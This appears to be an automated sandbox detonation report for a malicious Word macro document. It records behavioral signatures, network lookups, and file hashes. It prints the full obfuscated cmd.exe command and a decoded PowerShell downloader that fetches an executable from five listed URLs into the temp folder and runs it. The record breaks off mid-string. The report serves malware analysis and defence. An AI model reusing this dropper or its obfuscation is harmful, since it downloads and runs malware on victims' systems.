\\\/\__-/_/--_/z\\_/-/-/\-_\/-_W_\_/\-_/-_-/\-\A\-///_/\__--\\_$-_-//_--\/\/\_\(_-/\\_--//-/\\_h/\__\//-_\--\/_c\_/_--_-_-\/\\/a_\/_//\-_/\_---e-\_/-_-_\\_\///r\/--_\/__\\//_-o-/_\\_-_//-_/\\f/_\-\\/-_\--//_;/_-_\__-\-/\/\/'-/\\-\__//-/_-\e\_\-/--//\-__/\x//\_/_--/-\_\-_e/\\//-_--_\-\_/.\_\//_--/-\\/__'_\/-_-_-///\\\_+/_\-\/_/-_-\\/-F-/\_-__\\/\--//J\\/__\-/\/_-/_-c//\\_-/-_-_-\/\$-/-\/\_-/__-\/_+/-\_\_-_/_/\/--'/-_-\\/\-\__/_-\\_--\\_-//\//_-'//\-_--/\-/\\__+-\_-\__\/_\//-/p/\/__\//\_-\--_m\\-_-/-\/__/-_\e-/__\\/-_-\/_-\t/-_-/-_/\\_/\-_://_\\\_---/\-_/v_\/\-\-/_/_\_--n\/-_\-_-//_/-\\e_/-\//\_-\--_/_$__-//\--_\_\/-\=/\-_\\-/_-/_/_-i/-\/_\-_-_\/-_\s--/_/-__-/\_\\/w__-/--\\-_//\/\$/\_/--/_/\__-\-;_/--/-_/-\\__/\'_-\//\_\-_-/-_/4-/-_-/_\\-\\/__7_--_/\_/-/-\\\/9\_/\_/----\__//'-/-/\/_\--__\/_ _/\/\-\_/-/-__\=_\_\_--\/--_//\ //_\/\_----/__\F_\_-__///\\/\--J_//-_//\--__\\-c_-\-__\//-\//_-$\_//__\-/_\/-\-;_/\//_-\_\\/_--)__/__-/-\\\-/\/'_\_///--/\-\-\_@\-/\/\_/-\-__-_'//\\\_--\-/__-_(/-/_/_-\\_\-\/-t--_\/\\-_\-///_i\_/-_/-\_/\-_\/l/-_//--\__\/_-\p\/\_\--_//_/_--S_-/\-\\-//-__\_.\-/_\--\/_/_/\_'_--\__//-/\/-\\C\--/\_-_\/\-/_/S/_\\\_/__\/--/-4\-\\\/_---___//6/-\/_/_-_\/\-\_K/-_-\__/-\/_\\/O\/--__\_//_/\--P/\_/_-//-\\__--M\\--_--\/_///_\/_/\/\___/\--/--m_/_-/_\\_\-/--\o-_\-/_/\_\-\_-/c__\/\_-\-_-/-//._//\_//\\_--\_-g-/\_/\-/\-_-_\/n_//\/-/-\_-_\\_i_\\---/\/-/\/__v__-/\//-_\-_\-/o_\_-/-/\-\/\_-/m_-/\/_\_/-\-/\-a_-\/_\/-_-//\_\l--\_\_\/_-\/-//l--___\-/\\/-//_e\_-__-/\--//\_\s\-/__-\/\-__-/\a/-__\/\/\/-\-_-c////_\-\_-\_-\_/-/__\\\\_-//-/_/-\//_\-\-/__-/\:__-/_\_---///\\p\\_//_-\--\__//t-//\--\/__\/\_-t-/-\_\\_//-_/-_h/-\-/\\__/-/_-\@-/_\//_\-_\-/\_6_\\/\---\/-_//_X_--\/\-///-___\1/__\\-/_-/\_-\-i\--\/_-/\\-/_/_f--\///_\/\\_-_-6/----_\__/\_\/\P_\\_-_\//_\/---/-//-/_\-\-_\_/\m\/\_/\//__-\_--o/\-\_-/\__\-_//c--_\_\_/-/-\//_.-/__\/__\\-//-\a-\_-/__-/\/\_-/i\_/\\_-///\_-_-d\_-\\-_//_\/_/-e\/_--//_/\_\-\_m_\\-__/\\//_-/-l/-\//\\-_--\___o/\\-\-___/-\_//o\-\/__/_---\/_\c//-_\__-/\\/\-_c\_/\/_-/_\--/-_/__\__-\\-/\-////-\//__/_--\-/_\:_--//_\_\\-\_/-p__-\\/-///_-\-_t\\--\/_/_-_/\-_t_--\\-/_-\_\_//h-/\_--_///\_\_-@_\//-/-__\\/\-_h//\\-_-__--\/\_e\-_/-\_/\-\/-_/o_\/-/__\\/\--/-/-\-_/_-_/\\-_\/s//-\\\//___-\-_u\/_\-/\-/--/__\.\-/-\/_\/__/\--z_-/--/\__\/\/\-i\/-_-_\\__-\/-/b\/_--\/_\--/__\u/-/\/--__/_-_\\s/\-\__-/_-/-\/_c\_-///_-_/-_\-\/_--//--/\\__\/_///\-/-__\\-\/_-:-_\-\/\//___--\p-_//\-\_--\/__/t\_/\_-\-/_/_\--t_/--_\--/\\\_//h_/_//-_\\\-\_-/@/_/---\/\_\__-/K_/\\-_/-\/-__-/a_/_\\_/---\/\_-/_--/\//--__\\\/t_\-/\_\-//_\/-_a-\/--_\/\\___-/p_\-_//--\/\/\-_m\-_\///-_\-_-_\o\/__--/--\_\_//c-\//_--_\\__-/\_///_--\/\\_\--_m_-\//-_/-_\/\-\o/___-\/\\\--/-/d-_//\\_\_-\-/-/n\//_-__/_\\/--\a/\_\/-_/--_-/_\r/--\__/-\-_\\///_/-/-/--_\_\_\\s/_-_-_\--\\\//_e-\-/_/_-_-/\/\\d\\-/\-_/\--___/u\__-/\_\//-\--_l_\-\/-\//_/__\-c--_\\_/_//\/_--n-_\\\_-__/\//--i\__--\-_////-\\----\\_/__/\-/\_p-\/_-\/___-\//-w/\_--/\\_-_/-_//_--\--\//___\//r/_/\-/-/_\-_\-\b__\/\//-_-_-\-/.-\/_-_//_\/-\-\m-//\-\__/-\-__/o_\\_///_-_-\\--c-_-__--//\_\\//.-////_\\_\--_\_o\-___\/\-/\--//i/-\-\\___\-///-d\\/_/-\_\//--_-a/_\\----///___\r__\-\\_///_--/-o/__-\_/-/-\/_\\d/_/\_---\\\/-_/s\//_-_\_--//_\\e/--\_\_\_-/_\-/u_/\-__\--\/\/_-q_\\-/-\_/\_/-/_a//\--_/-\-\__\/r\-\\//\-___-_-/c-_-_\_/\/-/_/\\//_\-/_\/-\-__/-/-\\__-/-_\//_/\:-\-/\/__//_\_-\p_-/__/_/-\\/\\-t/--_/\/-\__/\-_t-/-__\_\--\_//\h-/--\____\\-//\@/\-\-\/\_//-__-X\_\/-\-_-_\//-/0_\\-_-//\/\_-_/M\\-\-_\__-//-_/n___\_\-\-/\/--/E/\/-\-_\_//-_\_/\-\/-_\-/-___\/m-_-_/_\-\-//_/\o-/\__\_\/-/-/\_c-/\\/-_--_\/_\/.\\\_//-_//_---\e\/-\\-__/-/_/\_n//---__\\/\_\-_i\\_\_---///\_/_l__//_-\\--\_\-/n/-___/\-/_/-\\-o___--//-\\\-//\h/\-\/\__/-/-__-n-\\_\--_//-__//i\__-_\\-\--_///m/__/\-\_/\/\--_o_/\-_-\\__\-//-a_/-/\\\-/__\-/-b-\_-_/_-//_\\-//_/--/-\__/_/-\\//_-__-/-\\-/_\\:-__-\-\\//\//_-p\--/\-_/_-//_\_t-/_-\/_\\_\--//t-\//--_\_\\_//_h-//_\\\-\-___//'\_/_\/_-_-\-\/-=\-\\//\__/_/-_-O-__\_/-\_\-/-//V/-\____-\//-/-\h\/--_-/-/\\_/__$\\/_-_/\-/_/--_;__\/\-//\--__-/t-/_\-/\\_/__/\-n-\/\-/_\/-\_-_/e/---/_\_/-__\\/i\_/_-\\/\-/_-_/l-_\/\-/-/-__\\/C\__\//_\_----//b_-/-\_--\//__/\e-//_\\-/-\-\__/W//\/_\_\__-/-\-._-/__\-/-\-\_//t--_/\\--_//__\/e/\/\/-/_--\\_-_N__\-/\/-/\-/-_\ \//_-_/_--/\-\_t/\/\\/--_--_\/_c\//\__//-\\--_-e-/\-__-_\_/\-\/j-_\//_-\-/\_-\/b-__\\_/\/---_//o_\-/\__/-/-\-_\--_\/\_-\\/--/_/w__///_--_\\\\/-e_\--\__//-_\\/-n\_\/_---\/_\-//=/\/\\_/_/_-_--\j_/-_/-\/-\__\-/L_\-\-///-___\-/h_\_/_-///_---\\$_-\/_/\/-_-\-\_ _-_--/\\//-_/_\l/---/\/\\\/____l/---\_/\_-//__\e/-/\\_/--__/\_-h-_//\/-\\__-/-_s-/_-\_-_\\\-//_r/_/\/_\-/\-__--e-_\--/_//\\\-_/w//\___\/_\/----o\/__-_\-\\/-_/-p&& for /l %D IN ( 6143 ,-16 ,15) dO SEt .`=!.`!!~'{:~%D, 1!&& iF %D == 15 cAlL %.`:~ -384% "

C:\Windows\SysWOW64\cmd.exe

cmD.Exe /V:O /R " set ~'{=-_\--/_-///\\__ /__\\_\-_/-/-\/ _/_-/_-/-_\-/\\ \\--//_-\__/\-_ _\\_////\--_\-- \_/-__-\/_-\\/- \-\\_-/__///\-- /_\/-/-\_-\-/__ \-//_//_--\\_\_ _-\\-_-\///_/-_ _\-/-/_\/-\_/-_ \__\--////\\-__ -/\__/\/-\\-__/ -__/\\-/-_\\/-_ /---\\/\\/-___/ //_\-\/_--/_\_\ //_--\_\_-\/-_\ /\__\--/_/-\\-/}\\__//_//-\---\}-/\\\\/__--//_-{-_-\_//\--\/\_/h/\/-\_-/-/__\-_c_-_/__-/\/\\-\/t_-/\\/_-_-\/\/-a-/--_//\-\\\_/_c_\-/_\_/\--\//_}/-\_\\//_-\-__/;\//---\_/_/\_-_k-_-//\__/\\_/\-a\--_-\\/__/_-/\e/-__\\_--/\\/-_r/\---_\\//\___-b\__/\_/\/----\/;-\_///_-\-\_-_\i-_\/_--\\/\_/-_s__/\\_-/\/_-\/-w/\\-_-_/_--\/\/$_\--__/\/-/_\\- /\-_//\-\\/-__-s-/\_-/-\_\_/-\_s\\_/-__\_//-/-\e\/\-_-_\\///__-c\_\-_-\\_//-//_o/\/-/\/-_\_\--_r_/_-\/__\--\//-P\\_-\\-/-_/-_/_-\\--//\___/_/--t_-___\---/\///\r_//\_-\-/__/-\-a/_/\_\/-\-/-\-_t\/\//_--__\-/\-S_/_\/--\/\_--_\;\-__\_/\_/\/--/)/\--\-_//_\-__\i--\_/-\\/__/-/\s/\/-\\--\__//__w-_\-\-_/__/-\/\$/-/__\-\_\//-_- \__\_-_--//-\\/,__-_\_//-\//\-\z\\--\/-_/_-/__/W/-\//-\_/\\-___A_\__\//--/--/_\$///_\-__\\-\/-_(/_-_\_-\/\-\_-/e_/-\-\_-//\_-\_l\//\/_-_--\_/-_i/-__\\__-\\/--/F\---//__\\//-\_d\_/__\---/\-\//a/_-\\/_\/--\__-o-/-_/\-_/\\/-_\l\//-\_\_-/-\-/_n-__-\/\/-\/_/\-w_-/\/\-__\\-/-_o/-_-__/-\_\-/\/D-_-_/\\-/_/_/\-.\_\//-/--_\-/__j-//-_\_-/\/\\-_L--/\__\/-\_\_/-h\/-_/_--/__-/\\$_-_\/-\/\-_/_/\{/\-\\\//_-_/_--y_\__//\/_-\---\r/----/____\\\/\t\--//\/_/__-_\-{\\-/_-\\_/-/_-_)-/__-///\_-\\-_O\_/\--/-_-_/\_/V--__\\--\//_/_/h_/---\/_\-/\_\/$/_\/\//-__--\_- _\/_\--_\_/--/\n/\\-\-_-_/-\_//i\__\---/\//_\-_ \\\/\__-/_/--_/z\\_/-/-/\-_\/-_W_\_/\-_/-_-/\-\A\-///_/\__--\\_$-_-//_--\/\/\_\(_-/\\_--//-/\\_h/\__\//-_\--\/_c\_/_--_-_-\/\\/a_\/_//\-_/\_---e-\_/-_-_\\_\///r\/--_\/__\\//_-o-/_\\_-_//-_/\\f/_\-\\/-_\--//_;/_-_\__-\-/\/\/'-/\\-\__//-/_-\e\_\-/--//\-__/\x//\_/_--/-\_\-_e/\\//-_--_\-\_/.\_\//_--/-\\/__'_\/-_-_-///\\\_+/_\-\/_/-_-\\/-F-/\_-__\\/\--//J\\/__\-/\/_-/_-c//\\_-/-_-_-\/\$-/-\/\_-/__-\/_+/-\_\_-_/_/\/--'/-_-\\/\-\__/_-\\_--\\_-//\//_-'//\-_--/\-/\\__+-\_-\__\/_\//-/p/\/__\//\_-\--_m\\-_-/-\/__/-_\e-/__\\/-_-\/_-\t/-_-/-_/\\_/\-_://_\\\_---/\-_/v_\/\-\-/_/_\_--n\/-_\-_-//_/-\\e_/-\//\_-\--_/_$__-//\--_\_\/-\=/\-_\\-/_-/_/_-i/-\/_\-_-_\/-_\s--/_/-__-/\_\\/w__-/--\\-_//\/\$/\_/--/_/\__-\-;_/--/-_/-\\__/\'_-\//\_\-_-/-_/4-/-_-/_\\-\\/__7_--_/\_/-/-\\\/9\_/\_/----\__//'-/-/\/_\--__\/_ _/\/\-\_/-/-__\=_\_\_--\/--_//\ //_\/\_----/__\F_\_-__///\\/\--J_//-_//\--__\\-c_-\-__\//-\//_-$\_//__\-/_\/-\-;_/\//_-\_\\/_--)__/__-/-\\\-/\/'_\_///--/\-\-\_@\-/\/\_/-\-__-_'//\\\_--\-/__-_(/-/_/_-\\_\-\/-t--_\/\\-_\-///_i\_/-_/-\_/\-_\/l/-_//--\__\/_-\p\/\_\--_//_/_--S_-/\-\\-//-__\_.\-/_\--\/_/_/\_'_--\__//-/\/-\\C\--/\_-_\/\-/_/S/_\\\_/__\/--/-4\-\\\/_---___//6/-\/_/_-_\/\-\_K/-_-\__/-\/_\\/O\/--__\_//_/\--P/\_/_-//-\\__--M\\--_--\/_///_\/_/\/\___/\--/--m_/_-/_\\_\-/--\o-_\-/_/\_\-\_-/c__\/\_-\-_-/-//._//\_//\\_--\_-g-/\_/\-/\-_-_\/n_//\/-/-\_-_\\_i_\\---/\/-/\/__v__-/\//-_\-_\-/o_\_-/-/\-\/\_-/m_-/\/_\_/-\-/\-a_-\/_\/-_-//\_\l--\_\_\/_-\/-//l--___\-/\\/-//_e\_-__-/\--//\_\s\-/__-\/\-__-/\a/-__\/\/\/-\-_-c////_\-\_-\_-\_/-/__\\\\_-//-/_/-\//_\-\-/__-/\:__-/_\_---///\\p\\_//_-\--\__//t-//\--\/__\/\_-t-/-\_\\_//-_/-_h/-\-/\\__/-/_-\@-/_\//_\-_\-/\_6_\\/\---\/-_//_X_--\/\-///-___\1/__\\-/_-/\_-\-i\--\/_-/\\-/_/_f--\///_\/\\_-_-6/----_\__/\_\/\P_\\_-_\//_\/---/-//-/_\-\-_\_/\m\/\_/\//__-\_--o/\-\_-/\__\-_//c--_\_\_/-/-\//_.-/__\/__\\-//-\a-\_-/__-/\/\_-/i\_/\\_-///\_-_-d\_-\\-_//_\/_/-e\/_--//_/\_\-\_m_\\-__/\\//_-/-l/-\//\\-_--\___o/\\-\-___/-\_//o\-\/__/_---\/_\c//-_\__-/\\/\-_c\_/\/_-/_\--/-_/__\__-\\-/\-////-\//__/_--\-/_\:_--//_\_\\-\_/-p__-\\/-///_-\-_t\\--\/_/_-_/\-_t_--\\-/_-\_\_//h-/\_--_///\_\_-@_\//-/-__\\/\-_h//\\-_-__--\/\_e\-_/-\_/\-\/-_/o_\/-/__\\/\--/-/-\-_/_-_/\\-_\/s//-\\\//___-\-_u\/_\-/\-/--/__\.\-/-\/_\/__/\--z_-/--/\__\/\/\-i\/-_-_\\__-\/-/b\/_--\/_\--/__\u/-/\/--__/_-_\\s/\-\__-/_-/-\/_c\_-///_-_/-_\-\/_--//--/\\__\/_///\-/-__\\-\/_-:-_\-\/\//___--\p-_//\-\_--\/__/t\_/\_-\-/_/_\--t_/--_\--/\\\_//h_/_//-_\\\-\_-/@/_/---\/\_\__-/K_/\\-_/-\/-__-/a_/_\\_/---\/\_-/_--/\//--__\\\/t_\-/\_\-//_\/-_a-\/--_\/\\___-/p_\-_//--\/\/\-_m\-_\///-_\-_-_\o\/__--/--\_\_//c-\//_--_\\__-/\_///_--\/\\_\--_m_-\//-_/-_\/\-\o/___-\/\\\--/-/d-_//\\_\_-\-/-/n\//_-__/_\\/--\a/\_\/-_/--_-/_\r/--\__/-\-_\\///_/-/-/--_\_\_\\s/_-_-_\--\\\//_e-\-/_/_-_-/\/\\d\\-/\-_/\--___/u\__-/\_\//-\--_l_\-\/-\//_/__\-c--_\\_/_//\/_--n-_\\\_-__/\//--i\__--\-_////-\\----\\_/__/\-/\_p-\/_-\/___-\//-w/\_--/\\_-_/-_//_--\--\//___\//r/_/\-/-/_\-_\-\b__\/\//-_-_-\-/.-\/_-_//_\/-\-\m-//\-\__/-\-__/o_\\_///_-_-\\--c-_-__--//\_\\//.-////_\\_\--_\_o\-___\/\-/\--//i/-\-\\___\-///-d\\/_/-\_\//--_-a/_\\----///___\r__\-\\_///_--/-o/__-\_/-/-\/_\\d/_/\_---\\\/-_/s\//_-_\_--//_\\e/--\_\_\_-/_\-/u_/\-__\--\/\/_-q_\\-/-\_/\_/-/_a//\--_/-\-\__\/r\-\\//\-___-_-/c-_-_\_/\/-/_/\\//_\-/_\/-\-__/-/-\\__-/-_\//_/\:-\-/\/__//_\_-\p_-/__/_/-\\/\\-t/--_/\/-\__/\-_t-/-__\_\--\_//\h-/--\____\\-//\@/\-\-\/\_//-__-X\_\/-\-_-_\//-/0_\\-_-//\/\_-_/M\\-\-_\__-//-_/n___\_\-\-/\/--/E/\/-\-_\_//-_\_/\-\/-_\-/-___\/m-_-_/_\-\-//_/\o-/\__\_\/-/-/\_c-/\\/-_--_\/_\/.\\\_//-_//_---\e\/-\\-__/-/_/\_n//---__\\/\_\-_i\\_\_---///\_/_l__//_-\\--\_\-/n/-___/\-/_/-\\-o___--//-\\\-//\h/\-\/\__/-/-__-n-\\_\--_//-__//i\__-_\\-\--_///m/__/\-\_/\/\--_o_/\-_-\\__\-//-a_/-/\\\-/__\-/-b-\_-_/_-//_\\-//_/--/-\__/_/-\\//_-__-/-\\-/_\\:-__-\-\\//\//_-p\--/\-_/_-//_\_t-/_-\/_\\_\--//t-\//--_\_\\_//_h-//_\\\-\-___//'\_/_\/_-_-\-\/-=\-\\//\__/_/-_-O-__\_/-\_\-/-//V/-\____-\//-/-\h\/--_-/-/\\_/__$\\/_-_/\-/_/--_;__\/\-//\--__-/t-/_\-/\\_/__/\-n-\/\-/_\/-\_-_/e/---/_\_/-__\\/i\_/_-\\/\-/_-_/l-_\/\-/-/-__\\/C\__\//_\_----//b_-/-\_--\//__/\e-//_\\-/-\-\__/W//\/_\_\__-/-\-._-/__\-/-\-\_//t--_/\\--_//__\/e/\/\/-/_--\\_-_N__\-/\/-/\-/-_\ \//_-_/_--/\-\_t/\/\\/--_--_\/_c\//\__//-\\--_-e-/\-__-_\_/\-\/j-_\//_-\-/\_-\/b-__\\_/\/---_//o_\-/\__/-/-\-_\--_\/\_-\\/--/_/w__///_--_\\\\/-e_\--\__//-_\\/-n\_\/_---\/_\-//=/\/\\_/_/_-_--\j_/-_/-\/-\__\-/L_\-\-///-___\-/h_\_/_-///_---\\$_-\/_/\/-_-\-\_ _-_--/\\//-_/_\l/---/\/\\\/____l/---\_/\_-//__\e/-/\\_/--__/\_-h-_//\/-\\__-/-_s-/_-\_-_\\\-//_r/_/\/_\-/\-__--e-_\--/_//\\\-_/w//\___\/_\/----o\/__-_\-\\/-_/-p&& for /l %D IN ( 6143 ,-16 ,15) dO SEt .`=!.`!!~'{:~%D, 1!&& iF %D == 15 cAlL %.`:~ -384% "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell $hLj=new-object Net.WebClient;$hVO='http://baominhonline.com/EnM0X@http://craquesdoradio.com.br/wp-includes/random_compat/aK@http://csubiz.us/oeh@http://ccoolmedia.com/P6fi1X6@http://casellamoving.com/MPOK64SC'.Split('@');$cJF = '974';$wsi=$env:temp+'\'+$cJF+'.exe';foreach($AWz in $hVO){try{$hLj.DownloadFile($AWz, $wsi);Start-Process $wsi;break;}catch{}}

Network

Country Destination Domain Proto
US 8.8.8.8:53 baominhonline.com udp
US 8.8.8.8:53 craquesdoradio.com.br udp
US 8.8.8.8:53 csubiz.us udp
US 8.8.8.8:53 ccoolmedia.com udp
US 8.8.8.8:53 casellamoving.com udp
US 76.223.105.230:80 casellamoving.com tcp
US 76.223.105.230:443 casellamoving.com tcp
US 76.223.105.230:443 casellamoving.com tcp

Files

memory/1664-0-0x000000002F0F1000-0x000000002F0F2000-memory.dmp

memory/1664-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1664-2-0x000000007173D000-0x0000000071748000-memory.dmp

memory/1664-6-0x00000000002A0000-0x00000000003A0000-memory.dmp

memory/1664-41-0x00000000002A0000-0x00000000003A0000-memory.dmp

memory/1664-7-0x00000000002A0000-0x00000000003A0000-memory.dmp

memory/1664-84-0x0000000006320000-0x0000000006420000-memory.dmp

memory/1664-151-0x0000000006320000-0x0000000006420000-memory.dmp

memory/1664-1740-0x000000007173D000-0x0000000071748000-memory.dmp

memory/1664-1741-0x00000000002A0000-0x00000000003A0000-memory.dmp

memory/1664-1742-0x0000000006320000-0x0000000006420000-memory.dmp

memory/1664-1743-0x0000000006320000-0x0000000006420000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 b05bb4e3da3053b7db3ee1ee22959dae
SHA1 9e50fac8322bb847c27f7089c5203ec5896225b3
SHA256 1aef690de2f600d07971f3545dc4a05e1f8a9fc004e8106dd51d32076d629c19
SHA512 17685061c444012d0ff7a725418cce4cfeca59ac5a590340fa2945e3b0b6036159f4e342b54b4e0d6729932ef87c9a4b15f379a3a756f84baf9569aac73006ea

memory/1664-1758-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1664-1759-0x000000007173D000-0x0000000071748000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 09:08

Reported

2024-05-27 09:11

Platform

win10v2004-20240508-en

Max time kernel

134s

Max time network

131s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\78a1829c397cf9eca27335cd43eeb5fe_JaffaCakes118.doc" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\SYSTEM32\cmd.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\78a1829c397cf9eca27335cd43eeb5fe_JaffaCakes118.doc" /o ""

C:\Windows\SYSTEM32\cmd.exe

cmd /c cmD.Exe /V:O /R " set ~'{=-_\--/_-///\\__ /__\\_\-_/-/-\/ _/_-/_-/-_\-/\\ \\--//_-\__/\-_ _\\_////\--_\-- \_/-__-\/_-\\/- \-\\_-/__///\-- /_\/-/-\_-\-/__ \-//_//_--\\_\_ _-\\-_-\///_/-_ _\-/-/_\/-\_/-_ \__\--////\\-__ -/\__/\/-\\-__/ -__/\\-/-_\\/-_ /---\\/\\/-___/ //_\-\/_--/_\_\ //_--\_\_-\/-_\ /\__\--/_/-\\-/}\\__//_//-\---\}-/\\\\/__--//_-{-_-\_//\--\/\_/h/\/-\_-/-/__\-_c_-_/__-/\/\\-\/t_-/\\/_-_-\/\/-a-/--_//\-\\\_/_c_\-/_\_/\--\//_}/-\_\\//_-\-__/;\//---\_/_/\_-_k-_-//\__/\\_/\-a\--_-\\/__/_-/\e/-__\\_--/\\/-_r/\---_\\//\___-b\__/\_/\/----\/;-\_///_-\-\_-_\i-_\/_--\\/\_/-_s__/\\_-/\/_-\/-w/\\-_-_/_--\/\/$_\--__/\/-/_\\- /\-_//\-\\/-__-s-/\_-/-\_\_/-\_s\\_/-__\_//-/-\e\/\-_-_\\///__-c\_\-_-\\_//-//_o/\/-/\/-_\_\--_r_/_-\/__\--\//-P\\_-\\-/-_/-_/_-\\--//\___/_/--t_-___\---/\///\r_//\_-\-/__/-\-a/_/\_\/-\-/-\-_t\/\//_--__\-/\-S_/_\/--\/\_--_\;\-__\_/\_/\/--/)/\--\-_//_\-__\i--\_/-\\/__/-/\s/\/-\\--\__//__w-_\-\-_/__/-\/\$/-/__\-\_\//-_- \__\_-_--//-\\/,__-_\_//-\//\-\z\\--\/-_/_-/__/W/-\//-\_/\\-___A_\__\//--/--/_\$///_\-__\\-\/-_(/_-_\_-\/\-\_-/e_/-\-\_-//\_-\_l\//\/_-_--\_/-_i/-__\\__-\\/--/F\---//__\\//-\_d\_/__\---/\-\//a/_-\\/_\/--\__-o-/-_/\-_/\\/-_\l\//-\_\_-/-\-/_n-__-\/\/-\/_/\-w_-/\/\-__\\-/-_o/-_-__/-\_\-/\/D-_-_/\\-/_/_/\-.\_\//-/--_\-/__j-//-_\_-/\/\\-_L--/\__\/-\_\_/-h\/-_/_--/__-/\\$_-_\/-\/\-_/_/\{/\-\\\//_-_/_--y_\__//\/_-\---\r/----/____\\\/\t\--//\/_/__-_\-{\\-/_-\\_/-/_-_)-/__-///\_-\\-_O\_/\--/-_-_/\_/V--__\\--\//_/_/h_/---\/_\-/\_\/$/_\/\//-__--\_- _\/_\--_\_/--/\n/\\-\-_-_/-\_//i\__\---/\//_\-_ \\\/\__-/_/--_/z\\_/-/-/\-_\/-_W_\_/\-_/-_-/\-\A\-///_/\__--\\_$-_-//_--\/\/\_\(_-/\\_--//-/\\_h/\__\//-_\--\/_c\_/_--_-_-\/\\/a_\/_//\-_/\_---e-\_/-_-_\\_\///r\/--_\/__\\//_-o-/_\\_-_//-_/\\f/_\-\\/-_\--//_;/_-_\__-\-/\/\/'-/\\-\__//-/_-\e\_\-/--//\-__/\x//\_/_--/-\_\-_e/\\//-_--_\-\_/.\_\//_--/-\\/__'_\/-_-_-///\\\_+/_\-\/_/-_-\\/-F-/\_-__\\/\--//J\\/__\-/\/_-/_-c//\\_-/-_-_-\/\$-/-\/\_-/__-\/_+/-\_\_-_/_/\/--'/-_-\\/\-\__/_-\\_--\\_-//\//_-'//\-_--/\-/\\__+-\_-\__\/_\//-/p/\/__\//\_-\--_m\\-_-/-\/__/-_\e-/__\\/-_-\/_-\t/-_-/-_/\\_/\-_://_\\\_---/\-_/v_\/\-\-/_/_\_--n\/-_\-_-//_/-\\e_/-\//\_-\--_/_$__-//\--_\_\/-\=/\-_\\-/_-/_/_-i/-\/_\-_-_\/-_\s--/_/-__-/\_\\/w__-/--\\-_//\/\$/\_/--/_/\__-\-;_/--/-_/-\\__/\'_-\//\_\-_-/-_/4-/-_-/_\\-\\/__7_--_/\_/-/-\\\/9\_/\_/----\__//'-/-/\/_\--__\/_ _/\/\-\_/-/-__\=_\_\_--\/--_//\ //_\/\_----/__\F_\_-__///\\/\--J_//-_//\--__\\-c_-\-__\//-\//_-$\_//__\-/_\/-\-;_/\//_-\_\\/_--)__/__-/-\\\-/\/'_\_///--/\-\-\_@\-/\/\_/-\-__-_'//\\\_--\-/__-_(/-/_/_-\\_\-\/-t--_\/\\-_\-///_i\_/-_/-\_/\-_\/l/-_//--\__\/_-\p\/\_\--_//_/_--S_-/\-\\-//-__\_.\-/_\--\/_/_/\_'_--\__//-/\/-\\C\--/\_-_\/\-/_/S/_\\\_/__\/--/-4\-\\\/_---___//6/-\/_/_-_\/\-\_K/-_-\__/-\/_\\/O\/--__\_//_/\--P/\_/_-//-\\__--M\\--_--\/_///_\/_/\/\___/\--/--m_/_-/_\\_\-/--\o-_\-/_/\_\-\_-/c__\/\_-\-_-/-//._//\_//\\_--\_-g-/\_/\-/\-_-_\/n_//\/-/-\_-_\\_i_\\---/\/-/\/__v__-/\//-_\-_\-/o_\_-/-/\-\/\_-/m_-/\/_\_/-\-/\-a_-\/_\/-_-//\_\l--\_\_\/_-\/-//l--___\-/\\/-//_e\_-__-/\--//\_\s\-/__-\/\-__-/\a/-__\/\/\/-\-_-c////_\-\_-\_-\_/-/__\\\\_-//-/_/-\//_\-\-/__-/\:__-/_\_---///\\p\\_//_-\--\__//t-//\--\/__\/\_-t-/-\_\\_//-_/-_h/-\-/\\__/-/_-\@-/_\//_\-_\-/\_6_\\/\---\/-_//_X_--\/\-///-___\1/__\\-/_-/\_-\-i\--\/_-/\\-/_/_f--\///_\/\\_-_-6/----_\__/\_\/\P_\\_-_\//_\/---/-//-/_\-\-_\_/\m\/\_/\//__-\_--o/\-\_-/\__\-_//c--_\_\_/-/-\//_.-/__\/__\\-//-\a-\_-/__-/\/\_-/i\_/\\_-///\_-_-d\_-\\-_//_\/_/-e\/_--//_/\_\-\_m_\\-__/\\//_-/-l/-\//\\-_--\__